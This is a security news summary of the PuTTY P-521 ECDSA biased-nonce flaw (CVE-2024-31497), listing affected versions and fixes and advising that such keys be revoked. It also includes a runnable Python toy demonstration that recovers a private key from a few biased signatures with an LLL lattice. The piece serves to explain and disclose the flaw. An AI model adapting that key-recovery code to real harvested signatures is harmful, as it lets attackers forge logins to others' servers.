cyware: Widely-Used PuTTY SSH Client Found Vulnerable to Key Recovery Attack

Summary: The PuTTY SSH and Telnet client has a critical vulnerability that could allow attackers to recover private keys and forge signatures, impacting various software products that incorporate PuTTY.

Threat Actor: Unknown | PuTTY
Victim: Users of PuTTY and other software products that incorporate a vulnerable version of PuTTY

Key Points:

  • The PuTTY Secure Shell (SSH) and Telnet client has a critical vulnerability that could be exploited to recover NIST P-521 private keys and forge signatures.
  • The flaw is due to the generation of biased ECDSA cryptographic nonces, allowing for the recovery of the private key in approximately 60 signatures.
  • Other software products that incorporate a vulnerable version of PuTTY, such as FileZilla, WinSCP, TortoiseGit, and TortoiseSVN, are also affected.
  • The issue has been addressed in the latest versions of PuTTY, FileZilla, WinSCP, and TortoiseGit, and users of TortoiseSVN are advised to use Plink from the latest PuTTY release until a patch is available.
  • ECDSA NIST-P521 keys used with any of the affected components should be considered compromised and revoked.

The maintainers of the PuTTY Secure Shell (SSH) and Telnet client are alerting users of a critical vulnerability impacting versions from 0.68 through 0.80 that could be exploited to achieve full recovery of NIST P-521 (ecdsa-sha2-nistp521) private keys.

The flaw has been assigned the CVE identifier CVE-2024-31497, with the discovery credited to researchers Fabian Bäumer and Marcus Brinkmann of the Ruhr University Bochum.

“The effect of the vulnerability is to compromise the private key,” the PuTTY project said in an advisory.

“An attacker in possession of a few dozen signed messages and the public key has enough information to recover the private key, and then forge signatures as if they were from you, allowing them to (for instance) log in to any servers you use that key for.”

To obtain those signatures, however, an attacker needs to control or have compromised a server the key is used to authenticate to, or to find them somewhere else the key has been used to sign, such as signed Git commits.

In a message posted on the Open Source Software Security (oss-sec) mailing list, Bäumer described the flaw as stemming from the generation of biased ECDSA cryptographic nonces, which could enable the recovery of the private key.

“The first 9 bits of each ECDSA nonce are zero,” Bäumer explained. “This allows for full secret key recovery in roughly 60 signatures by using state-of-the-art techniques.”

“These signatures can either be harvested by a malicious server (man-in-the-middle attacks are not possible given that clients do not transmit their signature in the clear) or from any other source, e.g. signed git commits through forwarded agents.”

Besides PuTTY itself, the flaw affects other products that ship a vulnerable version of the software:

  • FileZilla (3.24.1 – 3.66.5)
  • WinSCP (5.9.5 – 6.3.2)
  • TortoiseGit (2.4.0.2 – 2.15.0)
  • TortoiseSVN (1.10.0 – 1.14.6)

Following responsible disclosure, the issue has been addressed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3, and TortoiseGit 2.15.0.1. Users of TortoiseSVN are recommended to use Plink from the latest PuTTY 0.81 release when accessing an SVN repository via SSH until a patch becomes available.

Specifically, PuTTY now uses the RFC 6979 deterministic nonce construction for all DSA and ECDSA key types. Its earlier scheme also derived the nonce deterministically, so that signing did not depend on a source of high-quality randomness: it computed a SHA-512 hash and reduced the 512-bit result modulo the group order. That is fine for group orders of at most 512 bits, but the P-521 order is 521 bits, so the reduction changes nothing and the top nine bits of every nonce are zero. Those nine known bits per signature are exactly what a lattice (hidden number problem) attack needs to recover the key from a few dozen signatures.
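The following is an added example, not PuTTY's code or the researchers' attack tooling. It models both halves of the story above: a deterministic nonce whose width is shorter than the group order (so its top bits are always zero), and the hidden number problem lattice that turns a handful of such signatures into the private key. To keep a pure-Python LLL tractable it assumes a toy 61-bit prime-order group (q = 2**61 - 1) instead of P-521, a 40-bit nonce (21 leaking bits instead of 9), eight signatures instead of roughly 60, and a random r in place of x(kG), which the attack never uses. The function and constant names are the example's own. The real P-521 attack has the same shape but needs a lattice of about 60 signatures and a stronger reduction than plain LLL.

```python
"""Toy model of CVE-2024-31497: a deterministic nonce narrower than the group
order leaks its top bits, and an HNP lattice recovers the private key.

Added example (not PuTTY's code).  Assumptions: toy group order Q = 2**61 - 1
stands in for P-521; the nonce is a 40-bit hash, so 21 top bits are zero
(PuTTY: 512-bit SHA-512 reduced mod a 521-bit order, 9 zero bits); r is drawn
at random rather than computed as x(kG).  Needs Python 3.8+ for pow(x, -1, m).
"""
import hashlib
import random
from fractions import Fraction

Q = (1 << 61) - 1                               # toy group order (Mersenne prime)
NONCE_BITS = 40                                 # toy "hash width", narrower than Q
KNOWN_ZERO_BITS = Q.bit_length() - NONCE_BITS   # 21 here; 521 - 512 = 9 for P-521


def biased_nonce(priv, msg):
    """Old-PuTTY-style nonce: hash(secret || message), reduced into a range
    narrower than Q, so the top KNOWN_ZERO_BITS bits are always zero."""
    h = hashlib.sha512(priv.to_bytes(8, "big") + msg).digest()
    return int.from_bytes(h, "big") % (1 << NONCE_BITS)


def sign(priv, msg, rng):
    """ECDSA-shaped signature s = k^-1 (e + r*priv) mod Q.
    r is random here (stand-in for x(kG)); the attacker sees (e, r, s)."""
    e = int.from_bytes(hashlib.sha256(msg).digest(), "big") % Q
    k = biased_nonce(priv, msg)
    r = rng.randrange(1, Q)
    s = pow(k, -1, Q) * (e + r * priv) % Q
    return e, r, s


def lll(basis, delta=Fraction(99, 100)):
    """Textbook LLL over exact Fractions; fine for a ~10-dimensional lattice."""
    b = [[Fraction(x) for x in row] for row in basis]
    n = len(b)

    def dot(u, v):
        return sum(x * y for x, y in zip(u, v))

    def gram_schmidt():
        bs, mu = [], [[Fraction(0)] * n for _ in range(n)]
        for i in range(n):
            v = b[i][:]
            for j in range(i):
                mu[i][j] = dot(b[i], bs[j]) / dot(bs[j], bs[j])
                v = [x - mu[i][j] * y for x, y in zip(v, bs[j])]
            bs.append(v)
        return bs, mu

    bs, mu = gram_schmidt()
    k = 1
    while k < n:
        for j in range(k - 1, -1, -1):           # size-reduce b[k] against b[j]
            c = round(mu[k][j])
            if c:
                b[k] = [x - c * y for x, y in zip(b[k], b[j])]
                for idx in range(j):
                    mu[k][idx] -= c * mu[j][idx]
                mu[k][j] -= c
        lovasz = (delta - mu[k][k - 1] ** 2) * dot(bs[k - 1], bs[k - 1])
        if dot(bs[k], bs[k]) >= lovasz:
            k += 1
        else:
            b[k], b[k - 1] = b[k - 1], b[k]
            bs, mu = gram_schmidt()              # recompute after a swap
            k = max(k - 1, 1)
    return [[int(x) for x in row] for row in b]


def recover_private_key(sigs):
    """Hidden number problem: k_i = t_i*d + u_i (mod Q) with every k_i < B.
    Rows are scaled by Q to stay integral; the target lattice vector is
    (Q*k_1, ..., Q*k_m, B*d, Q*B), whose entries are all at most Q*B."""
    m = len(sigs)
    bound = 1 << NONCE_BITS
    t = [pow(s, -1, Q) * r % Q for _, r, s in sigs]
    u = [pow(s, -1, Q) * e % Q for e, _, s in sigs]
    basis = [[Q * Q if i == j else 0 for j in range(m + 2)] for i in range(m)]
    basis.append([Q * x for x in t] + [bound, 0])
    basis.append([Q * x for x in u] + [0, Q * bound])
    for row in lll(basis):
        if abs(row[-1]) == Q * bound:
            d = (row[m] if row[-1] > 0 else -row[m]) // bound % Q
            # sanity check: the candidate must explain every nonce as "small"
            if all((ti * d + ui) % Q < bound for ti, ui in zip(t, u)):
                return d
    return None


def demo(num_sigs=8, seed=1234):
    """Sign constructed messages with a random toy key, then recover the key."""
    rng = random.Random(seed)
    priv = rng.randrange(1, Q)
    sigs = [sign(priv, b"constructed message %d" % i, rng) for i in range(num_sigs)]
    return priv, recover_private_key(sigs)


if __name__ == "__main__":
    secret, recovered = demo()
    print("leaked bits per nonce:", KNOWN_ZERO_BITS)
    print("recovered == secret:", recovered == secret)
```

The fix in PuTTY 0.81 removes the leak at its source: RFC 6979 derives the nonce with HMAC-DRBG and rejects candidates outside [1, q-1] instead of reducing a too-short hash, so the nonce is uniform over the whole order and the lattice above has no short vector to find.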

On top of that, ECDSA NIST P-521 keys used with any of the vulnerable components should be considered compromised and revoked: remove them from authorized_keys files and their equivalents in other SSH servers, and from anywhere else they are trusted, such as Git hosting accounts. Such keys are easy to spot, since their public key lines begin with ecdsa-sha2-nistp521.

Source: https://thehackernews.com/2024/04/widely-used-putty-ssh-client-found.html

